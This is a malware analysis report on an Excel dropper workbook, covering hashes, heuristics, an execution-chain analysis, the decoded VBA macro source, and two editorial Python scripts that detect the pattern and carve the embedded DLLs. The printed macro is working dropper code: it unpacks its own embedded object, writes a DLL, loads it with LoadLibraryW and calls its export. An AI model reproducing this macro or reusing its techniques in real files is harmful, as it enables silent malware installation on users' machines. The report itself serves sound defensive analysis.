Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 55ed82dce7d88a19…

MALICIOUS

Office (OLE)

Size: 742.0 KB
Created: 2019-08-30 09:14:50
Authoring application: Microsoft Excel
First seen: 2019-10-30
MD5: df580709d68df472bc7ed2cefadd24b6
SHA-1: 562463604d7fcb79f7e4d154c5a8f58fbd138c9e
SHA-256: 55ed82dce7d88a19a6a9d8875c94688ca476b84bfba3fbfc0caff6e9f5525b83
Risk score: 500

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1105 Ingress Tool Transfer
  • T1204.002 User Execution: Malicious File
  • T1027 Obfuscated Files or Information

This Excel workbook carries VBA macros that drop and load a DLL carved out of its own embedded OLE package. No process is spawned from VBA: WScript.Shell is used only for ExpandEnvironmentStrings and SpecialFolders lookups, and the loader is LoadLibraryW plus a call into a Declare'd export.

Execution chain as recovered from the macro source (macros.bas): the workbook class module (renamed "Sem") handles Workbook_Activate and forwards to Module1.Workbook_Activate. That routine resolves an environment-variable name and a special-folder name stored in UserForm2.TextBox1.Tag and UserForm2.TextBox2.Tag (form property values, which the VBA dump does not include), changes directory to the first, and shows UserForm1. UserForm1's UserForm_Initialize strips WS_SYSMENU from the form with SetWindowLong so it cannot be closed, and its UserForm_Activate calls Module3.ReplaceCurrentModule, which: deletes any earlier oleObject*.bin, templates.xlsx.zip and module_p*.dll (Module2.KillArray); copies all sheets into a new workbook, saves it as OOXML (FileFormat:=51, templates.xlsx) and copies that to templates.xlsx.zip; uses Shell.Application CopyHere to pull xl\embeddings\oleObject1.bin out of the zip; calls NewValuje, which walks the object byte by byte for the triple 77, 90, 144 ("MZ" followed by 0x90, computed as 50+27, 50+40, 50+94) and writes a fixed number of bytes from the first hit (266240 bytes, module_p1.dll, 32-bit Office) or the second (186368 bytes, module_p2.dll, the Win64 branch) into the special folder; then loads that file with LoadLibraryW (declared as RbdSAslla2 with Alias "LoadLibraryW") and calls the export RbdSAslla, which the Declare statements bind to module_p1.dll / module_p2.dll. The Ole10Native stream carved below (465961 bytes) is large enough to hold both images (266240 + 186368 = 452608 bytes), which is consistent with the OLE_EMBEDDED_EXE hit.

Caveats on the heuristics: the OLE_VBA_ACTIVEX_XLM_STAGER match is on Sub test() in Module3, which nothing calls and which uses ExecuteExcel4Macro only for COUNTA against a workbook named web.xlsm (its "ReAPI_LENGTH" method name reads like a search-and-replace artefact of Resize, another sign of leftover code); the live ExecuteExcel4Macro calls are "MESSAGE(False, ""Debug"")", which just clears the status bar. The XLM path is therefore not the launcher in this sample. The GetProcAddress, VirtualAlloc and VirtualProtect string hits do not occur in the VBA source and come from other streams, most plausibly the embedded PE material. The carve embedded_office_00003186.exe runs from offset 0x3186 to the end of the file (747130 bytes of a 742.0 KB document), so it is everything after the first MZ header rather than a single PE image; the two DLLs should be extracted from ole10native_00.bin with the same byte-marker logic the macro uses. Nothing in the recovered VBA downloads anything, so the T1105 mapping is not supported by the macro itself (the dropped DLL may do so, which static analysis of the document cannot show).

Heuristics (12)

  • ClamAV: Xls.Dropper.Sdrop-7331943-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Dropper.Sdrop-7331943-0
  • Embedded PE executable critical OLE_EMBEDDED_EXE
    MZ/PE header found inside document — possible embedded executable
  • VBA macros detected medium (3 related findings) OLE_VBA_MACROS
    Document contains VBA macro code
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
        Dim SpecialPath As String
    Set D500 = CreateObject("WScript.Shell")
  • VBA ActiveX event launches decoded Excel4 macro critical OLE_VBA_ACTIVEX_XLM_STAGER
    VBA code attached to an auto-firing ActiveX/UserForm control event (e.g. _Layout/_Change/_Painted) decodes a string with Replace/Split/Join/StrReverse/Chr and passes the recovered formula text to ExecuteExcel4Macro. This bridges VBA event activation into XLM formula execution to call Win32 APIs / drop payloads while evading AutoOpen and Shell keyword detection — a high-confidence macro stager, not a specific Office parser CVE.
    Matched line in script
    Debug.Print Temp1
    CCount = Application.ExecuteExcel4Macro(Temp1)
    Debug.Print CCount
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        Dim SpecialPath As String
    Set D500 = CreateObject("WScript.Shell")
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • Reference to LoadLibrary API high SC_STR_LOADLIBRARY
    Reference to LoadLibrary API
  • Reference to GetProcAddress API high SC_STR_GETPROCADDRESS
    Reference to GetProcAddress API
  • Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOC
    Reference to VirtualAlloc API
  • Reference to VirtualProtect API medium SC_STR_VIRTUALPROTECT
    Reference to VirtualProtect API
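The heuristics above fire on single keywords (WScript.Shell, CreateObject, LoadLibrary). What actually makes this sample a dropper is the combination visible in the macro: a Declare against a non-system DLL name, a second Declare aliased to LoadLibraryW, a binary Put loop, and the re-save-as-OOXML / treat-as-zip / CopyHere trick that reaches the embedded object. The script below is an added example (editor's code, not the scanner's own heuristics and not part of the sample) that encodes those as named checks over an olevba-style dump and reports the two chains as combined findings; the system-DLL allowlist and the weights are editorial assumptions, SAMPLE_VBA is a verbatim excerpt of the macro on this page and BENIGN_VBA is constructed for contrast.

```python
"""VBA-source triage for the drop-and-load pattern seen in this sample.

Added example (editor's code, not the scanner's own heuristics and not part of
the malware): each check is a named regex over an olevba-style macro dump, and
two "chains" combine checks that only mean something together. The allowlist
of system DLLs and the weights are editorial assumptions. SAMPLE_VBA is a
verbatim excerpt of the macro on this page; BENIGN_VBA is constructed.
"""
import re
from typing import Dict, List

# Libraries a legitimate Declare normally targets (assumed allowlist).
SYSTEM_DLLS = {
    "kernel32", "user32", "advapi32", "shell32", "ole32", "oleaut32", "gdi32",
    "comdlg32", "ntdll", "ws2_32", "wininet", "urlmon", "shlwapi", "comctl32",
    "msvcrt", "psapi", "version", "winmm", "crypt32",
}

DECLARE_RE = re.compile(
    r'\bDeclare\s+(?:PtrSafe\s+)?(?:Function|Sub)\s+(\w+)\s+Lib\s+"([^"]+)"'
    r'(?:\s+Alias\s+"([^"]+)")?', re.I)

LINE_RULES = [  # (rule name, regex matched per line; '.' stops at newline)
    ("loadlibrary_alias", re.compile(r'\bAlias\s+"(?:LoadLibrary(?:Ex)?[AW]?|GetProcAddress)"', re.I)),
    ("binary_put", re.compile(r'^[ \t]*Put\s+#?\w+\s*,', re.I | re.M)),
    ("saveas_ooxml", re.compile(r'\.SaveAs\b.*FileFormat\s*:=\s*5[1-4]\b', re.I)),  # 51-54 = OOXML formats
    ("zip_extension", re.compile(r'"\.zip"', re.I)),
    ("shell_copyhere", re.compile(r'\.CopyHere\b', re.I)),
    ("embedded_ole_path", re.compile(r'xl\\embeddings\\oleObject\d*\.bin', re.I)),
    ("xlm_execute", re.compile(r'\bExecuteExcel4Macro\b', re.I)),
    ("wscript_shell", re.compile(r'CreateObject\s*\(\s*"WScript\.Shell"', re.I)),
]

# Checks that are individually noisy but together describe this sample's
# self-unpack (re-save as OOXML, treat as zip, pull the embedding) and
# drop-and-load (write bytes, LoadLibraryW, call a Declare'd export) stages.
CHAINS = {
    "chain:unpack_own_ooxml": {"saveas_ooxml", "zip_extension", "shell_copyhere", "embedded_ole_path"},
    "chain:drop_and_load_dll": {"binary_put", "loadlibrary_alias", "declare_nonsystem_dll"},
}
WEIGHTS = {"chain:unpack_own_ooxml": 40, "chain:drop_and_load_dll": 50, "declare_nonsystem_dll": 20}


def join_continuations(src: str) -> str:
    """Fold VBA ' _' line continuations; the sample's Declare for the dropped
    DLL puts the Lib name on the following line, which would defeat per-line
    matching."""
    return re.sub(r"[ \t]+_[ \t]*\r?\n[ \t]*", " ", src)


def scan_vba(src: str) -> Dict[str, List[str]]:
    """Return {rule: [evidence, ...]} for every rule and chain that fires."""
    src = join_continuations(src)
    findings: Dict[str, List[str]] = {}
    for name, rx in LINE_RULES:
        for m in rx.finditer(src):
            findings.setdefault(name, []).append(m.group(0).strip())
    for m in DECLARE_RE.finditer(src):
        func, lib = m.group(1), m.group(2)
        base = lib.lower().rsplit("\\", 1)[-1]
        base = base[:-4] if base.endswith(".dll") else base
        if base not in SYSTEM_DLLS:
            findings.setdefault("declare_nonsystem_dll", []).append(f"{func} -> {lib}")
    for chain, needed in CHAINS.items():
        if needed.issubset(findings):
            findings[chain] = sorted(needed)
    return findings


def score(findings: Dict[str, List[str]]) -> int:
    """Simple additive score; unweighted rules count 5 each (assumption)."""
    return sum(WEIGHTS.get(name, 5) for name in findings)


SAMPLE_VBA = r'''
#If Win64 Then
    Public Declare PtrSafe Function RbdSAslla Lib _
        "module_p2.dll" () As Integer
    Public Declare PtrSafe Function RbdSAslla2 Lib "kernel32" Alias "LoadLibraryW" (ByVal lpLibFileName As String) As Long
#Else
   Public Declare Function RbdSAslla2 Lib "kernel32" Alias "LoadLibraryW" (ByVal lpLibFileName As String) As Long
     Public Declare Function RbdSAslla Lib _
        "module_p1.dll" () As Integer
#End If
    Open nm For Binary Lock Read Write As #d_1
        Put #d_1, , CByte(d_5(i))
    ZipName = TempName + ".zip"
        ActiveWorkbook.SaveAs TempName, FileFormat:=51
        FileCopy TempName, ZipName
        Set oApp = CreateObject("Shell.Application")
        oApp.Namespace(ZipFolder).CopyHere oApp.Namespace(ZipName).items.Item("xl\embeddings\oleObject1.bin")
        No_RbdSAslla = RbdSAslla2(nm)
        RbdSAslla
'''

BENIGN_VBA = r'''
Private Declare PtrSafe Function GetTickCount Lib "kernel32" () As Long
Sub Report()
    MsgBox "Elapsed: " & GetTickCount()
End Sub
'''

if __name__ == "__main__":
    for label, src in (("sample", SAMPLE_VBA), ("benign", BENIGN_VBA)):
        f = scan_vba(src)
        print(f"{label}: score={score(f)}")
        for name, hits in sorted(f.items()):
            print(f"  {name}: {hits}")
```

Run it against the output of `olevba --decode` (or any macro dump); the continuation folding matters because a plain grep for `Lib "module_p2.dll"` misses the Declare in this sample, whose Lib name sits on the line after the `_`.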

Extracted artifacts (3)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8010 bytes
SHA-256: 2fdbb7387ec95608b3db06dd9f891f58ce9933ddbe09ad22196d9addbdfb86f8
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Sem"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Activate()
If UserForm1.Visible = False Then
Module1.Workbook_Activate
End If

End Sub

Attribute VB_Name = "Page1"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
#If Win64 Then
    Public Declare PtrSafe Function RbdSAslla Lib _
        "module_p2.dll" () As Integer
    Public Declare PtrSafe Function RbdSAslla2 Lib "kernel32" Alias "LoadLibraryW" (ByVal lpLibFileName As String) As Long
#Else
   Public Declare Function RbdSAslla2 Lib "kernel32" Alias "LoadLibraryW" (ByVal lpLibFileName As String) As Long
     Public Declare Function RbdSAslla Lib _
        "module_p1.dll" () As Integer
#End If
        

Public Sub NewValuje(s As String, nm As String, fl As Long, d_6 As Integer)
    Dim d_1 As Long, d_2 As Byte, d_3 As Byte, d_4 As Byte
    Dim d_5() As Long

    ReDim d_5(1 To fl)
    d_5(1) = CByte(50 + 27)
    d_5(2) = CByte(50 + 40)
    d_5(3) = CByte(50 + 94)
    
    d_1 = FreeFile
    Open s For Binary Access Read As d_1
    Dim cur As Integer
    cur = 1
    Do While Not EOF(d_1)
        Get d_1, , d_2
        If d_2 = d_5(1) Then
           Get d_1, , d_3
           If d_3 = d_5(2) Then
                Get d_1, , d_4
                If d_4 = d_5(3) Then
                     If cur = d_6 Then
                        For k = 4 To fl
                            Get d_1, , d_2
                            d_5(k) = d_2
                            Next k
                         Exit Do
                     Else
                        cur = cur + 1
                     End If
                End If
           End If
        End If
    Loop
    Close d_1
    
    d_1 = FreeFile
    Open nm For Binary Lock Read Write As #d_1
    For i = LBound(d_5) To UBound(d_5)
        Put #d_1, , CByte(d_5(i))
    Next i

    Close #d_1
End Sub


Public Sub Workbook_Activate()

ExecuteExcel4Macro "MESSAGE(False, ""Debug"")"

Dim D500 As Object
    Dim SpecialPath As String
Set D500 = CreateObject("WScript.Shell")
   
UserForm2.TextBox1.Tag = D500.ExpandEnvironmentStrings("%" + UserForm2.TextBox1.Tag + "%")

UserForm2.TextBox1.Tag = Replace(UserForm2.TextBox1.Tag, "%", "")
UserForm2.TextBox2.Tag = D500.SpecialFolders(UserForm2.TextBox2.Tag)

ChDir (UserForm2.TextBox1.Tag)

    UserForm1.show
ExecuteExcel4Macro "MESSAGE(False, ""Debug"")"
End Sub


Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{9B3DABF1-341B-4E96-99C1-B7207A1AB871}{32B70631-FA61-4E0F-8568-AC4DDCD97227}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub Label1_Click()

End Sub

Private Sub UserForm_Activate()
DoEvents
ReplaceCurrentModule
End Sub

Private Sub UserForm_Initialize()
Call SystemButtonSettings(Me, False)

End Sub

Attribute VB_Name = "Module2"
Private Const GWL_STYLE = -16
Private Const WS_CAPTION = &HC00000
Private Const WS_SYSMENU = &H80000

#If VBA7 Then

    Private Declare PtrSafe Function GetWindowLong _
        Lib "user32" Alias "GetWindowLongA" (ByVal hWnd As Long, _
        ByVal nIndex As Long) As Long
    Private Declare PtrSafe Function SetWindowLong _
        Lib "user32" Alias "SetWindowLongA" (ByVal hWnd As Long, _
        ByVal nIndex As Long, ByVal dwNewLong As Long) As Long
    Private Declare PtrSafe Function FindWindowA _
        Lib "user32" (ByVal lpClassName As String, _
        ByVal lpWindowName As String) As Long
    Private Declare PtrSafe Function DrawMenuBar _
        Lib "user32" (ByVal hWnd As Long) As Long
        
#Else

    Private Declare Function GetWindowLong _
        Lib "user32" Alias "GetWindowLongA" ( _
        ByVal hWnd As Long, ByVal nIndex As Long) As Long
    Private Declare Function SetWindowLong _
        Lib "user32" Alias "SetWindowLongA" ( _
        ByVal hWnd As Long, ByVal nIndex As Long, ByVal dwNewLong As Long) As Long
    Private Declare Function FindWindowA _
        Lib "user32" (ByVal lpClassName As String, _
        ByVal lpWindowName As String) As Long
    Private Declare Function DrawMenuBar _
        Lib "user32" (ByVal hWnd As Long) As Long
  
#End If



Public Sub KillArray(ParamArray PathList() As Variant)
    On Error Resume Next
    For Each Key In PathList
        Kill Key
    Next Key
    On Error GoTo 0
End Sub






Public Sub SystemButtonSettings(frm As Object, show As Boolean)
Dim windowStyle As Long
Dim windowHandle As Long

windowHandle = FindWindowA(vbNullString, frm.Caption)
windowStyle = GetWindowLong(windowHandle, GWL_STYLE)

If show = False Then

    SetWindowLong windowHandle, GWL_STYLE, (windowStyle And Not WS_SYSMENU)

Else

    SetWindowLong windowHandle, GWL_STYLE, (windowStyle + WS_SYSMENU)

End If

DrawMenuBar (windowHandle)

End Sub



Attribute VB_Name = "Module3"


Public Sub ReplaceCurrentModule()
    TempName = UserForm2.TextBox1.Tag & "\templates.xlsx"
    ZipName = TempName + ".zip"
    ZipFolder = UserForm2.TextBox1.Tag '& "\UnzTmp"
    Dim nm As String
    Dim API_LENGTH As Long
    Dim d_6 As Integer
    nm = UserForm2.TextBox2.Tag + "\module_p1"
    API_LENGTH = 266240
    d_6 = 1
            
#If Win64 Then
    nm = UserForm2.TextBox2.Tag + "\module_p2"
    API_LENGTH = 186368
    d_6 = 2
#End If
nm = nm + ".d" + "ll"
        KillArray ZipFolder & "\oleObj" + "ect*.bin", ZipName, nm
        
    DoEvents
        ThisWorkbook.Sheets.Copy
        Application.DisplayAlerts = False
        ActiveWorkbook.SaveAs TempName, FileFormat:=51
    DoEvents
    ActiveWorkbook.Close
    DoEvents
        
    
        FileCopy TempName, ZipName
        
        Set oApp = CreateObject("Shell.Application")
        oApp.Namespace(ZipFolder).CopyHere oApp.Namespace(ZipName).items.Item("xl\embeddings\oleObject1.bin")
        NewValuje ZipFolder + "\oleObject1.bin", nm, API_LENGTH, d_6
        
        ChDir (UserForm2.TextBox2.Tag)
        No_RbdSAslla = RbdSAslla2(nm)
        RbdSAslla

End Sub



Sub test()

Temp = "'" & ThisWorkbook.Path & "\[web.xlsm]Sheet1'!"
Temp1 = Temp & Rows(1).Address(, , xlR1C1)
Temp1 = "Counta(" & Temp1 & ")"
Debug.Print Temp1
CCount = Application.ExecuteExcel4Macro(Temp1)
Debug.Print CCount
Temp2 = Temp & Columns("A").Address(, , xlR1C1)
Temp2 = "Counta(" & Temp2 & ")"
RCount = Application.ExecuteExcel4Macro(Temp2)
ReDim arr(1 To RCount, 1 To CCount)

For R = 1 To RCount
    For C = 1 To CCount
        Temp3 = Temp & Cells(R, C).Address(, , xlR1C1)
        arr(R, C) = Application.ExecuteExcel4Macro(Temp3)
    Next
Next

Range("A1").ReAPI_LENGTH(RCount, CCount).Value = arr

End Sub



Attribute VB_Name = "UserForm2"
Attribute VB_Base = "0{60B2D69D-A27B-4B98-B9AA-38D5112CA728}{F641394C-4A27-46FC-926F-6EE29F9DC7B1}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Page11"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
embedded_office_00003186.exe | embedded-pe | Office MZ+PE at offset 0x3186 | 747130 bytes
SHA-256: 0eb6ebb8cf869b8f212e05b5b41aa79c1d24c2e9d310b6b341438bc8fb16c4a9
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Static shellcode analysis recovered command string(s): WScript.Shell
ole10native_00.bin | ole-package | OLE Ole10Native stream: MBD006B9836/Ole10Native | 465961 bytes
SHA-256: dbcae8c5a528096d8a676fbc8ae8b8863392f22f389f436f5eaa3aaaacec374a
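The macro's NewValuje() is the only part of this sample that has to be reproduced to get at the payloads: it does not parse the OLE container, it just walks bytes looking for "MZ" followed by 0x90, takes the n-th hit and copies a fixed length. The script below is an added example (editor's code, not the sample's own VBA and not part of the original report) that does the same thing from Python so the two DLLs can be pulled out of ole10native_00.bin, or out of the oleObject1.bin the macro itself extracts, without ever running the document. The slot table (hit 1 / 266240 bytes for module_p1.dll, hit 2 / 186368 bytes for module_p2.dll) is taken from ReplaceCurrentModule(); fake_pe() and TEST_BLOB are constructed stand-ins so it runs offline.

```python
"""Stand-alone re-implementation of the macro's NewValuje() carving step.

Added example (editor's code, not the sample's own VBA and not part of the
original report). It reproduces what the macro does to oleObject1.bin: walk the
bytes looking for 77, 90, 144 ("MZ" followed by 0x90), take the n-th hit and
copy a fixed number of bytes from it to a file. The slot table comes from
ReplaceCurrentModule(): hit 1 / 266240 bytes for module_p1.dll, hit 2 / 186368
bytes for module_p2.dll. Because it scans for the byte marker rather than
parsing the container, it can be pointed at the carved ole10native_00.bin
as well. fake_pe() builds a constructed stand-in so the script runs offline.
"""
import struct
import sys
from pathlib import Path
from typing import Dict, Optional, Tuple

MARKER = bytes([50 + 27, 50 + 40, 50 + 94])  # == b"MZ\x90", as the VBA computes it
SLOTS = {  # name -> (1-based occurrence, byte count), as set in the macro
    "module_p1.dll": (1, 266240),   # #Else branch: 32-bit Office
    "module_p2.dll": (2, 186368),   # #If Win64 branch
}


def find_occurrence(blob: bytes, n: int) -> int:
    """Offset of the n-th marker hit, or -1. Mirrors the VBA loop exactly: a
    byte read while testing for 'Z' or 0x90 is consumed even on mismatch, so
    the macro (and this function) would miss a header inside b"MMZ\\x90"."""
    i, hits, end = 0, 0, len(blob)
    while i < end:
        b, i = blob[i], i + 1
        if b == MARKER[0] and i < end:
            b, i = blob[i], i + 1
            if b == MARKER[1] and i < end:
                b, i = blob[i], i + 1
                if b == MARKER[2]:
                    hits += 1
                    if hits == n:
                        return i - 3
    return -1


def carve(blob: bytes, n: int, length: int) -> bytes:
    """Bytes the macro would write for slot n (the macro always writes
    `length` bytes; a blob shorter than that simply yields a short result)."""
    off = find_occurrence(blob, n)
    if off < 0:
        raise ValueError(f"marker occurrence {n} not found")
    return blob[off:off + length]


def looks_like_pe(data: bytes) -> bool:
    """Cheap sanity check on a carve: DOS header, e_lfanew inside the buffer,
    and the PE signature where e_lfanew points."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return 0 < e_lfanew <= len(data) - 4 and data[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def carve_all(blob: bytes, out_dir: Optional[Path] = None) -> Dict[str, Tuple[int, bool]]:
    """Carve every slot; return {name: (bytes carved, passes PE check)} and
    optionally write the files out for further analysis."""
    results = {}
    for name, (n, length) in SLOTS.items():
        data = carve(blob, n, length)
        results[name] = (len(data), looks_like_pe(data))
        if out_dir is not None:
            (out_dir / name).write_bytes(data)
    return results


def fake_pe(total_len: int) -> bytes:
    """Constructed stand-in for an embedded DLL: 0x40-byte DOS header with the
    sample's marker, e_lfanew -> 0x40, PE signature, zero padding."""
    hdr = bytearray(0x40)
    hdr[:3] = MARKER
    struct.pack_into("<I", hdr, 0x3C, 0x40)
    return bytes(hdr) + b"PE\0\0" + b"\0" * (total_len - 0x44)


# Constructed blob shaped like the Ole10Native payload: some leading container
# bytes, the 32-bit image, a gap, then the 64-bit image.
TEST_BLOB = b"junk" + fake_pe(266240) + b"\0" * 10 + fake_pe(186368)

if __name__ == "__main__":
    blob = Path(sys.argv[1]).read_bytes() if len(sys.argv) > 1 else TEST_BLOB
    out = Path(sys.argv[2]) if len(sys.argv) > 2 else None
    for name, (size, ok) in carve_all(blob, out).items():
        print(f"{name}: {size} bytes, PE header {'ok' if ok else 'NOT found'}")
```

Usage: `python carve.py ole10native_00.bin outdir/` writes module_p1.dll and module_p2.dll for static analysis of the export RbdSAslla. The looks_like_pe() check is deliberate: the sample's own carver trusts its hard-coded lengths, so if a different build of this document embeds images of other sizes the second slot may start in the wrong place, and a failed header check is the quickest way to notice that.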